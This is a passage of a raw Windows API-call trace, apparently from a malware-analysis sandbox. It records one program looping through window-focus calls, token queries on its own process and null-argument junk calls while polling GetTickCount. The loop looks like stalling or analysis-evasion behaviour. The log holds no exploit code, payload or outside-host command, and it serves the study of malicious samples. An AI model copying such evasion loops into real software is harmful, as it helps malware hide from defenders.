out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.540] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.540] TextOutW (hdc=0x0, x=2944, y=7124, lpString="", c=0) returned 1 [0072.540] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.540] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.540] GetTickCount () returned 0x1f392 [0072.540] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.540] SetForegroundWindow (hWnd=0x0) returned 0 [0072.540] BringWindowToTop (hWnd=0x0) returned 0 [0072.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6cc) returned 1 [0072.540] GetTokenInformation (in: TokenHandle=0x6cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.540] GetLastError () returned 0x7a [0072.540] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.540] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.541] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.541] TextOutW (hdc=0x0, x=2954, y=7149, lpString="", c=0) returned 1 [0072.541] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.541] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.541] GetTickCount () returned 0x1f392 [0072.541] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.542] SetForegroundWindow (hWnd=0x0) returned 0 [0072.542] BringWindowToTop (hWnd=0x0) returned 0 [0072.542] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6d0) returned 1 [0072.542] GetTokenInformation (in: TokenHandle=0x6d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.542] GetLastError () returned 0x7a [0072.542] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.542] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.542] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.542] TextOutW (hdc=0x0, x=2964, y=7174, lpString="", c=0) returned 1 [0072.542] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.542] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.542] GetTickCount () returned 0x1f392 [0072.543] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.543] SetForegroundWindow (hWnd=0x0) returned 0 [0072.543] BringWindowToTop (hWnd=0x0) returned 0 [0072.543] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6d4) returned 1 [0072.543] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.543] GetLastError () returned 0x7a [0072.543] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.543] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.544] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.544] TextOutW (hdc=0x0, x=2974, y=7199, lpString="", c=0) returned 1 [0072.544] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.544] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.544] GetTickCount () returned 0x1f392 [0072.545] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.545] SetForegroundWindow (hWnd=0x0) returned 0 [0072.545] BringWindowToTop (hWnd=0x0) returned 0 [0072.545] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6d8) returned 1 [0072.545] GetTokenInformation (in: TokenHandle=0x6d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.545] GetLastError () returned 0x7a [0072.545] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.545] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.545] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.545] TextOutW (hdc=0x0, x=2984, y=7224, lpString="", c=0) returned 1 [0072.545] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.545] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.545] GetTickCount () returned 0x1f392 [0072.549] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.549] SetForegroundWindow (hWnd=0x0) returned 0 [0072.549] BringWindowToTop (hWnd=0x0) returned 0 [0072.549] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6dc) returned 1 [0072.549] GetTokenInformation (in: TokenHandle=0x6dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.549] GetLastError () returned 0x7a [0072.549] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.550] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.550] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.550] TextOutW (hdc=0x0, x=2994, y=7249, lpString="", c=0) returned 1 [0072.550] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.550] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.550] GetTickCount () returned 0x1f3a2 [0072.551] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.551] SetForegroundWindow (hWnd=0x0) returned 0 [0072.552] BringWindowToTop (hWnd=0x0) returned 0 [0072.552] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6e0) returned 1 [0072.552] GetTokenInformation (in: TokenHandle=0x6e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.552] GetLastError () returned 0x7a [0072.552] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.552] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.552] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.552] TextOutW (hdc=0x0, x=3004, y=7274, lpString="", c=0) returned 1 [0072.552] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.552] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.552] GetTickCount () returned 0x1f3a2 [0072.553] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.553] SetForegroundWindow (hWnd=0x0) returned 0 [0072.553] BringWindowToTop (hWnd=0x0) returned 0 [0072.553] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6e4) returned 1 [0072.553] GetTokenInformation (in: TokenHandle=0x6e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.553] GetLastError () returned 0x7a [0072.553] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.553] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.553] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.554] TextOutW (hdc=0x0, x=3014, y=7299, lpString="", c=0) returned 1 [0072.554] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.554] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.554] GetTickCount () returned 0x1f3a2 [0072.554] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.554] SetForegroundWindow (hWnd=0x0) returned 0 [0072.554] BringWindowToTop (hWnd=0x0) returned 0 [0072.554] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6e8) returned 1 [0072.554] GetTokenInformation (in: TokenHandle=0x6e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.554] GetLastError () returned 0x7a [0072.554] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.554] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.555] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.555] TextOutW (hdc=0x0, x=3024, y=7324, lpString="", c=0) returned 1 [0072.555] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.555] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.555] GetTickCount () returned 0x1f3a2 [0072.556] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.556] SetForegroundWindow (hWnd=0x0) returned 0 [0072.556] BringWindowToTop (hWnd=0x0) returned 0 [0072.556] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6ec) returned 1 [0072.556] GetTokenInformation (in: TokenHandle=0x6ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.556] GetLastError () returned 0x7a [0072.556] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.556] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.556] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.556] TextOutW (hdc=0x0, x=3034, y=7349, lpString="", c=0) returned 1 [0072.556] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.556] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.556] GetTickCount () returned 0x1f3a2 [0072.557] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.557] SetForegroundWindow (hWnd=0x0) returned 0 [0072.557] BringWindowToTop (hWnd=0x0) returned 0 [0072.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6f0) returned 1 [0072.557] GetTokenInformation (in: TokenHandle=0x6f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.557] GetLastError () returned 0x7a [0072.557] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.557] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.558] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.558] TextOutW (hdc=0x0, x=3044, y=7374, lpString="", c=0) returned 1 [0072.558] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.558] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.558] GetTickCount () returned 0x1f3a2 [0072.559] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.559] SetForegroundWindow (hWnd=0x0) returned 0 [0072.559] BringWindowToTop (hWnd=0x0) returned 0 [0072.559] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6f4) returned 1 [0072.559] GetTokenInformation (in: TokenHandle=0x6f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.559] GetLastError () returned 0x7a [0072.559] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.559] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.559] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.559] TextOutW (hdc=0x0, x=3054, y=7399, lpString="", c=0) returned 1 [0072.560] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.560] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.560] GetTickCount () returned 0x1f3a2 [0072.561] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.561] SetForegroundWindow (hWnd=0x0) returned 0 [0072.561] BringWindowToTop (hWnd=0x0) returned 0 [0072.561] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6f8) returned 1 [0072.561] GetTokenInformation (in: TokenHandle=0x6f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.561] GetLastError () returned 0x7a [0072.561] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.561] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.561] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.561] TextOutW (hdc=0x0, x=3064, y=7424, lpString="", c=0) returned 1 [0072.561] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.562] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.562] GetTickCount () returned 0x1f3a2 [0072.562] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.562] SetForegroundWindow (hWnd=0x0) returned 0 [0072.562] BringWindowToTop (hWnd=0x0) returned 0 [0072.562] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6fc) returned 1 [0072.562] GetTokenInformation (in: TokenHandle=0x6fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.562] GetLastError () returned 0x7a [0072.562] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.562] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.563] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.563] TextOutW (hdc=0x0, x=3074, y=7449, lpString="", c=0) returned 1 [0072.563] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.563] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.563] GetTickCount () returned 0x1f3a2 [0072.563] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.563] SetForegroundWindow (hWnd=0x0) returned 0 [0072.564] BringWindowToTop (hWnd=0x0) returned 0 [0072.564] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x700) returned 1 [0072.564] GetTokenInformation (in: TokenHandle=0x700, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.564] GetLastError () returned 0x7a [0072.564] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.564] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.564] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.564] TextOutW (hdc=0x0, x=3084, y=7474, lpString="", c=0) returned 1 [0072.564] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.564] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.564] GetTickCount () returned 0x1f3a2 [0072.565] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.565] SetForegroundWindow (hWnd=0x0) returned 0 [0072.565] BringWindowToTop (hWnd=0x0) returned 0 [0072.565] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x704) returned 1 [0072.565] GetTokenInformation (in: TokenHandle=0x704, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.565] GetLastError () returned 0x7a [0072.565] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.565] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.566] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.566] TextOutW (hdc=0x0, x=3094, y=7499, lpString="", c=0) returned 1 [0072.566] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.566] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.566] GetTickCount () returned 0x1f3b1 [0072.566] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.566] SetForegroundWindow (hWnd=0x0) returned 0 [0072.566] BringWindowToTop (hWnd=0x0) returned 0 [0072.567] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x708) returned 1 [0072.567] GetTokenInformation (in: TokenHandle=0x708, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.567] GetLastError () returned 0x7a [0072.567] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.567] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.567] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.567] TextOutW (hdc=0x0, x=3104, y=7524, lpString="", c=0) returned 1 [0072.567] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.567] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.567] GetTickCount () returned 0x1f3b1 [0072.568] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.568] SetForegroundWindow (hWnd=0x0) returned 0 [0072.568] BringWindowToTop (hWnd=0x0) returned 0 [0072.568] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x70c) returned 1 [0072.568] GetTokenInformation (in: TokenHandle=0x70c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.568] GetLastError () returned 0x7a [0072.568] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.568] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.569] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.569] TextOutW (hdc=0x0, x=3114, y=7549, lpString="", c=0) returned 1 [0072.569] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.569] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.569] GetTickCount () returned 0x1f3b1 [0072.570] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.570] SetForegroundWindow (hWnd=0x0) returned 0 [0072.570] BringWindowToTop (hWnd=0x0) returned 0 [0072.570] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x710) returned 1 [0072.570] GetTokenInformation (in: TokenHandle=0x710, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.570] GetLastError () returned 0x7a [0072.570] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.570] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.571] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.571] TextOutW (hdc=0x0, x=3124, y=7574, lpString="", c=0) returned 1 [0072.571] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.571] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.571] GetTickCount () returned 0x1f3b1 [0072.571] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.571] SetForegroundWindow (hWnd=0x0) returned 0 [0072.571] BringWindowToTop (hWnd=0x0) returned 0 [0072.571] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x714) returned 1 [0072.571] GetTokenInformation (in: TokenHandle=0x714, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.571] GetLastError () returned 0x7a [0072.571] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.571] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.572] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.572] TextOutW (hdc=0x0, x=3134, y=7599, lpString="", c=0) returned 1 [0072.572] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.572] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.572] GetTickCount () returned 0x1f3b1 [0072.573] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.573] SetForegroundWindow (hWnd=0x0) returned 0 [0072.573] BringWindowToTop (hWnd=0x0) returned 0 [0072.573] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x718) returned 1 [0072.573] GetTokenInformation (in: TokenHandle=0x718, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.573] GetLastError () returned 0x7a [0072.573] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.573] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.573] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.573] TextOutW (hdc=0x0, x=3144, y=7624, lpString="", c=0) returned 1 [0072.574] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.574] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.574] GetTickCount () returned 0x1f3b1 [0072.574] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.574] 